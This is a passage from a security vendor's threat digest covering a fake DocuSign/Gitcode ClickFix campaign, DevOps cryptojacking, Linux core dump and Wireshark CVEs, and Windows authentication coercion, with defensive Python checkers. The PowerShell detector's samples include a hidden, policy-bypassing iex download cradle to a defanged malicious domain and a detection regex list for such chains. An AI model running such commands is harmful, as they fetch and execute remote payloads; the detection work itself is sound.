  • Regularly review and restrict the use of legitimate remote administration tools within the environment.
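
The "suspicious PowerShell activity" called out above has a recognisable shape in script block logs. The Python below is an added example, not code from the original report or the researchers it cites; it scores constructed sample lines shaped like the ScriptBlockText of PowerShell event 4104, and the defanged domain is the one this digest names.

```python
"""Flag ClickFix-style PowerShell launches in script block log text.

Added example for the fake DocuSign/Gitcode entry above; not code from the
original report or the researchers it cites. It scores constructed lines
shaped like the ScriptBlockText of PowerShell event 4104 for the traits of the
paste-into-Run chain: hidden window, no profile, policy bypass, encoded
command, and a remote fetch executed in place. The defanged domain is the one
named in the digest; the Base64 blob is a placeholder, not a real payload.
"""
import re

# Each rule alone is a weak signal; the verdict needs a combination.
RULES = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile", re.compile(r"-no(?:p|profile)\b", re.I)),
    ("exec_policy_bypass", re.compile(r"-(?:ep|exec(?:utionpolicy)?)\s+bypass", re.I)),
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("download_cradle", re.compile(r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|curl)\b", re.I)),
    ("invoke_expression", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)),
    ("remote_url", re.compile(r"https?://[^\s'\"]+", re.I)),
]

def rule_hits(script_block):
    """Names of the rules the block trips, in RULES order."""
    return [name for name, rx in RULES if rx.search(script_block)]

def is_clickfix_like(script_block):
    """Alert when a remote fetch is executed or encoded in the same block,
    or when three or more launch-evasion flags appear together."""
    hits = set(rule_hits(script_block))
    if "download_cradle" in hits and hits & {"invoke_expression", "encoded_command"}:
        return True
    return len(hits) >= 3

# Constructed samples: two malicious, two benign for contrast.
SAMPLE_BLOCKS = [
    "powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
    ".DownloadString('https://tradingviewtool[.]com/stage2.ps1')\"",
    "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
    "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }",
    "Invoke-WebRequest -Uri https://intranet.example.invalid/r.csv -OutFile C:\\Temp\\r.csv",
]

if __name__ == "__main__":
    for block in SAMPLE_BLOCKS:
        print("ALERT" if is_clickfix_like(block) else "ok   ", rule_hits(block))
```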

References:

https://thehackernews.com/2025/06/fake-docusign-gitcode-sites-spread.html


19. Cryptojacking Campaign Exploits DevOps APIs and Open WebUI Systems

A new cryptojacking campaign, tracked as JINX-0132, is targeting publicly accessible DevOps infrastructure—including Docker, Gitea, HashiCorp Consul, and Nomad servers—to deploy cryptocurrency miners. Attackers are leveraging misconfigurations and known vulnerabilities, using off-the-shelf tools from GitHub to evade attribution and detection.

Key Details:

  • Targets: Publicly exposed Docker, Gitea, Consul, Nomad, and Open WebUI systems
  • Attack Methods:

    • Exploits Docker API to spin up containers running XMRig miners
    • Leverages Gitea misconfigurations (e.g., INSTALL_LOCK=false, RCE via git hooks)
    • Abuses Consul’s service registration and health checks for code execution
    • Exploits Nomad’s insecure default API to create jobs that download and run XMRig miners
    • Uses Open WebUI’s plugin system to upload and execute malicious Python scripts
  • Payloads:

    • XMRig and T-Rex cryptocurrency miners
    • Java-based loaders and infostealers (on Windows)
    • Linux persistence via systemd services and process hiding libraries (processhider, argvhider)
    • Windows infostealer targeting Discord and Chrome wallet extensions

Observed Infrastructure:

  • Downloaded tools and payloads directly from GitHub repositories
  • C2 and payload hosting via Discord webhooks and IP 185.208.159[.]155

Mitigation/Workaround:

  • Audit and secure all DevOps and cloud management interfaces; restrict public access
  • Apply security patches and enforce strong authentication for Docker, Gitea, Consul, Nomad, and Open WebUI
  • Monitor for unauthorized container creation, suspicious jobs, or plugin uploads
  • Use process monitoring to detect hidden mining activity and infostealer behavior
  • Remove unnecessary internet exposure for all management and training systems
  • Educate teams about the risks of misconfiguration and the importance of regular security reviews
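
Two of the misconfigurations this campaign abuses, Gitea's INSTALL_LOCK and an unauthenticated Docker API, can be checked from configuration files. The Python below is an added example, not code from the original report or from the Gitea or Docker projects; the sample configs are constructed and the file paths are assumed defaults.

```python
"""Spot two of the DevOps misconfigurations named in the JINX-0132 entry.

Added example; not code from the original report or from Gitea or Docker. It
reads Gitea's app.ini and Docker's daemon.json as text and reports (1) an
INSTALL_LOCK that is not true, leaving the web installer reachable, and (2) a
tcp:// Docker listener without tlsverify, exposing the daemon API. Sample
configs are constructed; the file paths mentioned are assumed defaults.
"""
import configparser
import json

def gitea_install_unlocked(app_ini_text):
    """True when [security] INSTALL_LOCK is absent or not a true value."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   allow_no_value=True, delimiters=("=",))
    # app.ini carries keys before the first section; give them a home.
    cp.read_string("[DEFAULT]\n" + app_ini_text)
    try:
        return not cp.getboolean("security", "INSTALL_LOCK", fallback=False)
    except ValueError:              # unparsable value: treat as not locked
        return True

def docker_tcp_without_tls(daemon_json_text):
    """tcp:// entries of daemon.json 'hosts' that are not protected by
    tlsverify ('tls': true alone encrypts but does not authenticate clients)."""
    cfg = json.loads(daemon_json_text)
    hosts = cfg.get("hosts", [])
    if isinstance(hosts, str):
        hosts = [hosts]
    tcp = [h for h in hosts if h.startswith("tcp://")]
    return tcp if tcp and not cfg.get("tlsverify", False) else []

def audit(app_ini_text, daemon_json_text):
    """Findings as strings; empty when both checks pass."""
    findings = []
    if gitea_install_unlocked(app_ini_text):
        findings.append("gitea: INSTALL_LOCK is not true; installer page reachable")
    for h in docker_tcp_without_tls(daemon_json_text):
        findings.append(f"docker: {h} listens without tlsverify")
    return findings

# Constructed samples carrying the weak settings.
GITEA_APP_INI = """\
APP_NAME = Gitea: Git with a cup of tea
RUN_MODE = prod
[security]
INSTALL_LOCK = false
SECRET_KEY = placeholder-not-a-real-key
"""
DOCKER_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
```

Point the two functions at the real files (commonly /etc/gitea/app.ini or custom/conf/app.ini, and /etc/docker/daemon.json) to audit a host.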

References:

https://thehackernews.com/2025/06/cryptojacking-campaign-exploits-devops.html



  • Linux Core Dump Flaws Enable Password Hash Theft in Ubuntu, RHEL, and Fedora

Two newly disclosed vulnerabilities in Linux core dump handlers—apport (Ubuntu) and systemd-coredump (RHEL, Fedora)—could allow local attackers to extract sensitive information, including password hashes, from privileged process memory. These race condition bugs, tracked as CVE-2025-5054 and CVE-2025-4598, highlight the risks of improper core dump handling in multi-user environments.

Key Details:

  • CVE-2025-5054 (CVSS 4.7):
    • Affects Canonical apport up to 2.32.0
    • Race condition allows a local attacker to exploit PID reuse and Linux namespaces to access core dumps from privileged processes
  • CVE-2025-4598 (CVSS 4.7):

    • Affects systemd-coredump
    • Attackers can force a SUID process to crash, then quickly replace it with a non-SUID binary using the same PID, gaining access to the original core dump and potentially reading sensitive data such as /etc/shadow password hashes

Attack Scenario:

  • Exploiting these flaws requires local access and the ability to win a race condition, but successful attacks can expose password hashes, encryption keys, or other confidential data from core dumps.

Impacted Systems:

  • Ubuntu (apport)
  • RHEL, Fedora (systemd-coredump)
  • Debian is not affected by CVE-2025-4598 by default unless systemd-coredump is manually installed
  • Amazon Linux and Gentoo have issued similar advisories

Mitigation/Workaround:

  • Apply security updates for apport and systemd-coredump as soon as available
  • As an immediate mitigation, disable core dumps for SUID binaries by running:

    echo 0 > /proc/sys/fs/suid_dumpable

    (Note: This will prevent crash analysis for SUID binaries but blocks the attack vector.)

  • Enforce strict access controls and monitor for suspicious local activity
  • Regularly audit system configurations and restrict unnecessary local user accounts
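
The echo workaround above does not survive a reboot, so it is worth checking both the live kernel value and the persisted sysctl setting. The Python below is an added example, not code from the advisory or the affected projects; the live value is read from a path you pass in and the sysctl.conf text is constructed.

```python
"""Verify SUID core dumps are off now and will stay off after a reboot.

Added example for the core dump entry above; not code from the advisory or the
affected projects. The digest's workaround (echo 0 to /proc/sys/fs/suid_dumpable)
lasts only until reboot, so the value must also be persisted in sysctl config.
The live value is read from a path you pass in; the conf text is constructed.
"""
import re

LIVE_PATH = "/proc/sys/fs/suid_dumpable"   # 0 = never dump set-uid processes
SETTING = re.compile(r"^-?\s*fs\.suid_dumpable\s*=\s*(\S+)$")  # '-' prefix: sysctl ignores errors

def parse_sysctl_conf(text):
    """Effective fs.suid_dumpable from sysctl.conf-style text, or None if unset.
    Later lines override earlier ones, as sysctl does; '#' and ';' start comments."""
    value = None
    for raw in text.splitlines():
        line = raw.strip()
        if line and line[0] not in "#;":
            m = SETTING.match(line)
            if m:
                value = m.group(1)
    return value

def read_live_value(path=LIVE_PATH):
    """Current kernel value as a string, or None if the file is unreadable."""
    try:
        with open(path) as fh:
            return fh.read().strip()
    except OSError:
        return None

def assess(live_value, conf_text):
    """One of: hardened, runtime_only (reverts at reboot), config_only (persisted, not applied), exposed, unknown."""
    if live_value is None:
        return "unknown"
    live_ok, conf_ok = live_value == "0", parse_sysctl_conf(conf_text) == "0"
    if live_ok and conf_ok:
        return "hardened"
    if live_ok:
        return "runtime_only"
    return "config_only" if conf_ok else "exposed"

SAMPLE_CONF = """\
# /etc/sysctl.d/99-hardening.conf (constructed); the last line wins
kernel.kptr_restrict = 2
fs.suid_dumpable = 2
fs.suid_dumpable = 0
"""
```

On a live host, call assess(read_live_value(), open("/etc/sysctl.d/99-hardening.conf").read()); a config_only result means sysctl --system has not yet been run.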

References:

https://thehackernews.com/2025/05/new-linux-flaws-allow-password-hash.html


  • Wireshark Vulnerability Enables DoS via Malicious Packet Injection (CVE-2025-5601)

A critical vulnerability in Wireshark, the widely used network protocol analyzer, could allow attackers to trigger denial-of-service (DoS) attacks by injecting malformed packets or distributing corrupted capture files. The flaw, tracked as CVE-2025-5601 (wnpa-sec-2025-02, CVSS 7.8), affects millions of users and has significant implications for organizations relying on Wireshark for network monitoring and incident response.

Key Details:

  • CVE: CVE-2025-5601
  • Severity: High (CVSS 7.8)
  • Vulnerability Type: Buffer overflow (CWE-120) in the column utility module
  • Affected Versions:

    • Wireshark 4.4.0 through 4.4.6
    • Wireshark 4.2.0 through 4.2.12
  • Attack Vectors:

    • Injection of malformed packets into monitored network traffic
    • Distribution of malicious packet capture files to Wireshark users

Impact:

  • Successful exploitation causes Wireshark to crash, disrupting network analysis and monitoring operations
  • Potential to impact real-time security monitoring and incident response in enterprise environments

Mitigation/Workaround:

  • Upgrade immediately to Wireshark version 4.4.7 or 4.2.12, which contain patches for this vulnerability
  • Only open capture files from trusted sources
  • Limit packet capture operations to trusted network segments
  • Implement network segmentation to reduce exposure
  • Review and update network monitoring security protocols regularly

References:

https://www.wireshark.org/security/wnpa-sec-2025-02.html
https://nvd.nist.gov/vuln/detail/CVE-2025-5601


  • Windows Authentication Coercion Attacks Threaten Enterprise Networks

Authentication coercion attacks remain a significant risk to enterprise Active Directory environments, enabling attackers with limited privileges to escalate to domain-wide administrative access. Despite Microsoft’s ongoing security enhancements, these techniques continue to evolve and exploit gaps in Windows authentication protocols and service configurations.

Key Details:

  • Attack Techniques:
    • Abuse of Remote Procedure Call (RPC) interfaces such as MS-RPRN (PrinterBug), MS-EFSR (PetitPotam), MS-DFSNM (DFS Coercion), and MS-WSP (WSP Coercion)
    • Coercion of Windows computer accounts to authenticate with attacker-controlled systems, enabling credential relay and privilege escalation
    • Exploitation of legitimate Windows services, including printer management and encrypted file services, to trigger authentication flows
  • Recent Developments:

    • Attack tools (e.g., ntlmrelayx.py) have been updated to bypass Microsoft’s mitigations by leveraging new RPC server capabilities
    • Automated modules (e.g., NetExec efsr_spray) can activate vulnerable services and exploit SMB shares, including printer queues
    • HTTP-based coercion remains viable via the WebClient service and .searchConnector-ms files on accessible shares

  • Microsoft Protections:

    • Extended Protection for Authentication (EPA), LDAP channel binding, and SMB signing are now enabled by default on new Windows Server and Windows 11 installations
    • Upgraded systems may retain legacy configurations, leaving them exposed
    • Some mitigations, such as disabling unencrypted AD CS Web Enrollment APIs, are only active on fresh installs

Impact:

  • Attackers can impersonate computer accounts, abuse S4U2Self and Resource-Based Constrained Delegation (RBCD), and potentially gain DCSync privileges for full domain compromise
  • Kerberos relaying attacks are expected to become more prominent as NTLM is phased out

Mitigation/Workaround:

  • Enforce SMB signing and LDAP channel binding across all Windows systems, not just new installations
  • Audit and disable unnecessary services, especially WebClient, on all endpoints
  • Regularly review and update group policies to ensure modern authentication protections are in place
  • Monitor for suspicious authentication attempts and RPC activity, particularly involving computer accounts
  • Educate IT teams on evolving coercion and relay attack techniques and ensure prompt application of security updates

References:

https://cybersecuritynews.com/windows-authentication-coercion-attacks/

Ready to get started?

Contact us to arrange a half day Managed SOC and XDR workshop in Dubai

© 2025 HawkEye – Managed CSOC and XDR powered by DTS Solution. All Rights Reserved.